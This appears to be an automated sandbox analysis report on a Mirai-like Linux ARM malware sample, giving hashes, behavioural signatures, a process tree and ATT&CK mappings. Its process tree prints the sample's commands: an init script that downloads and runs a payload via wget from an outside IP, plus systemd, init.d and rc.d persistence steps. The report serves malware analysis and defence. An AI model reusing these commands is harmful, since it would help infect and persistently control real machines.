Analysis
-
max time kernel
149s -
max time network
191s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/11/2024, 03:03
Static task
static1
Behavioral task
behavioral1
Sample
dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf
Resource
debian9-armhf-20240611-en
General
-
Target
dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf
-
Size
193KB
-
MD5
4a92b4798caba7746c21f0f809a41089
-
SHA1
4958a347e371034b4740d46179e9edc0b1b01247
-
SHA256
dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a
-
SHA512
41a6d5a2e318f49b238690606556cfe1f9d11c6bdaf41c844dd75732dccf40c0a0b4705892ee5924364379a990bf601b90df0296206358d8f761b63ddd54ea9e
-
SSDEEP
6144:e56CMC0WSGLa2jIyfJkDMgBH+y2bpM/9BRKeumqwQjy/:xCVSGLa+IyfJkDMXh+/Qjmqljy/
Malware Config
Signatures
-
Contacts a large (22823) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 676 sh 678 chmod 681 sh 684 sh 686 chmod -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for modification /dev/misc/watchdog dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf -
Checks mountinfo of local process 1 TTPs 1 IoCs
Checks mountinfo of running processes which indicate if it is running in chroot jail.
description ioc Process File opened for reading /proc/680/mountinfo dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /etc/profile dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/system dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for modification /etc/init.d/sh sh -
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/custom.service dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf -
Modifies Bash startup script 2 TTPs 1 IoCs
description ioc Process File opened for modification /etc/profile dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 652 dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf -
Command and Scripting Interpreter: Unix Shell 1 TTPs 3 IoCs
Execute scripts via Unix Shell.
pid Process 656 sh 688 sh 693 sh -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/785/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/796/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/739/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/777/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/779/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/784/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/775/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/798/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/703/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/726/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/729/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/758/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/710/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/712/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/714/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/799/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/783/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/787/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/self/stat systemctl File opened for reading /proc/660/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/765/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/776/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/725/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/728/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/780/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/794/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/727/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/733/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/748/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/755/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/716/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/726/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/763/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/705/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/720/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/770/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/751/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/768/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/776/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/1/cgroup dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/700/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/719/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/659/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/782/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/788/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/706/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/717/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/720/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/749/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/764/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/cmdline systemctl File opened for reading /proc/727/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/744/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/757/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/789/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/795/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/1/environ systemctl File opened for reading /proc/704/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/772/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/786/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/773/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/722/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/732/status dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf File opened for reading /proc/732/cmdline dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf
Processes
-
/tmp/dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf/tmp/dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf1⤵
- Modifies Watchdog functionality
- Checks mountinfo of local process
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads runtime system information
PID:652 -
/bin/sh/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:656 -
/bin/systemctlsystemctl enable custom.service3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:665
-
-
-
/bin/sh/bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
PID:676 -
/bin/chmodchmod +x /etc/init.d/system3⤵
- File and Directory Permissions Modification
PID:678
-
-
-
/bin/sh/bin/sh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"2⤵
- File and Directory Permissions Modification
- Modifies init.d
PID:681
-
-
/bin/sh/bin/sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
PID:684 -
/bin/chmodchmod +x /etc/init.d/sh3⤵
- File and Directory Permissions Modification
PID:686
-
-
-
/bin/sh/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:688 -
/bin/mkdirmkdir -p /etc/rc.d3⤵PID:690
-
-
-
/bin/sh/bin/sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:693 -
/bin/lnln -s /etc/init.d/sh /etc/rc.d/S99sh3⤵PID:694
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
109B
MD5735cae7d3cbab0f59d95f84790282103
SHA11cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe
-
Filesize
368B
MD55d64a6c10d95746b321d88f8283565ee
SHA192aeb5d86b84b38a10fa74ae7ee12333b7f58b44
SHA2560ca8dcdeb338f978ce9703ff074d898dd8223859accb381d849fb180b96f7582
SHA512b299a27118ffd3891d707156a09dfd3d8671a884134c1e997ce13feccd5c5547c77c737dff4b7f425a50871918ad92744d635916551b0752663dd0578af5dcce
-
Filesize
96B
MD5f000251d92c773cc3ee1ca22cf5f0788
SHA1e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA25631a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA5120dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2
-
Filesize
101B
MD53d6b6e1b05ad5d0538ccd8804bcd279b
SHA10fc061b51c225d5bea072c939de05e8a856558bc
SHA256cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA5121957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98
-
Filesize
290B
MD519a440fdac7f578f2fb33719698a082c
SHA1ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA5128bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb